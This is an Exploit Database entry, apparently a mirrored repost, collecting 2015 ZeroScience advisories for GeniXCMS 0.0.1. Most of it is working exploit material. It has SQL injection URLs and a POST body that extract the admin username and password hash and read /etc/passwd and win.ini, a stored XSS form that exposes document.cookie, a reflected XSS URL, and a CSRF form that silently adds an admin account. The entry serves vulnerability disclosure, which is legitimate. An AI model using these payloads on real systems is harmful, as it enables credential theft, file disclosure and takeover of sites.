GeniXCMS 0.0.1 – Multiple Vulnerabilities

• Exploit Database
• 15 阅读

• 作者： LiquidWorm
  日期： 2015-03-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36321/

• 
  GeniXCMS v0.0.1 Remote Unauthenticated SQL Injection Exploit
  
  Vendor: MetalGenix
  Product web page: http://www.genixcms.org
  Affected version: 0.0.1
  
  Summary: GenixCMS is a PHP Based Content Management System and Framework (CMSF).
  It's a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer to
  Advanced Developer. Some manual configurations are needed to make this application to
  work.
  
  Desc: Input passed via the 'page' GET parameter and the 'username' POST parameter is not
  properly sanitised before being used in SQL queries. This can be exploited to manipulate
  SQL queries by injecting arbitrary SQL code.
  
  Tested on: nginx/1.4.6 (Ubuntu)
   Apache 2.4.10 (Win32)
   PHP 5.6.3
   MySQL 5.6.21
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2015-5232
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5232.php
  
  
  05.03.2015
  
  ---
  
  
  Get admin user/pass hash:
  -------------------------
  
  http://localhost/genixcms/index.php?page=1' union all select 1,2,(select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,1) ,4,5,6,7,8,9,10 and 'j'='j
  
  
  
  Read file (C:\windows\win.ini) and MySQL version:
  -------------------------------------------------
  
  http://localhost/genixcms/index.php?page=1' union all select 1,2,load_file(0x433a5c77696e646f77735c77696e2e696e69),4,@@version,6,7,8,9,10 and 'j'='j
  
  
  
  Read file (/etc/passwd) and MySQL version:
  ------------------------------------------
  
  http://localhost/genixcms/index.php?page=1' union all select 1,2,load_file(0x2f6574632f706173737764),4,@@version,6,7,8,9,10 and 'j'='j
  
  
  
  Get admin user/pass hash:
  -------------------------
  
  POST /genixcms/gxadmin/login.php HTTP/1.1
  Host: localhost
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 335
  Accept: */*
  User-Agent: ZSLScan_1.4
  Connection: Close
  
  password=1&username=' and(select 1 from(select count(*),concat((select (select (select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1&login=
  
  ################################################################################################
  
  GeniXCMS v0.0.1 Persistent Script Insertion Vulnerability
  
  Vendor: MetalGenix
  Product web page: http://www.genixcms.org
  Affected version: 0.0.1
  
  Summary: GenixCMS is a PHP Based Content Management System and Framework (CMSF).
  It's a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer to
  Advanced Developer. Some manual configurations are needed to make this application to
  work.
  
  Desc: Input passed to the 'cat' POST parameter is not properly sanitised before being
  returned to the user. This can be exploited to execute arbitrary HTML and script code
  in a user's browser session in context of an affected site.
  
  Tested on: nginx/1.4.6 (Ubuntu)
   Apache 2.4.10 (Win32)
   PHP 5.6.3
   MySQL 5.6.21
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2015-5233
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5233.php
  
  
  05.03.2015
  
  ---
  
  
  Stored:
  -------
  
  <html>
  <body>
  <form action="http://localhost/genixcms/gxadmin/index.php?page=categories" method="POST">
  <input type="hidden" name="parent" value="2" />
  <input type="hidden" name="cat" value='"><script>alert(document.cookie)</script>' />
  <input type="hidden" name="addcat" value="" />
  <input type="submit" value="Insert" />
  </form>
  </body>
  </html>
  
  
  
  Reflected:
  ----------
  
  http://localhost/genixcms/index.php?page=1<script>confirm("ZSL")</script>'
  
  ################################################################################################
  
  
  GeniXCMS v0.0.1 CSRF Add Admin Exploit
  
  Vendor: MetalGenix
  Product web page: http://www.genixcms.org
  Affected version: 0.0.1
  
  Summary: GenixCMS is a PHP Based Content Management System and Framework (CMSF).
  It's a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer to
  Advanced Developer. Some manual configurations are needed to make this application to
  work.
  
  Desc: The application allows users to perform certain actions via HTTP requests without
  performing any validity checks to verify the requests. This can be exploited to perform
  certain actions with administrative privileges if a logged-in user visits a malicious web
  site.
  
  Tested on: nginx/1.4.6 (Ubuntu)
   Apache 2.4.10 (Win32)
   PHP 5.6.3
   MySQL 5.6.21
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2015-5234
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5234.php
  
  
  05.03.2015
  
  ---
  
  
  <html>
  <body>
  <form action="http://localhost/genixcms/gxadmin/index.php?page=users" method="POST">
  <input type="hidden" name="userid" value="Testingus" />
  <input type="hidden" name="pass1" value="123456" />
  <input type="hidden" name="pass2" value="123456" />
  <input type="hidden" name="email" value="t00t@zeroscience.eu" />
  <input type="hidden" name="group" value="0" />
  <input type="hidden" name="adduser" value="" />
  <input type="submit" value="Forge!" />
  </form>
  </body>
  </html>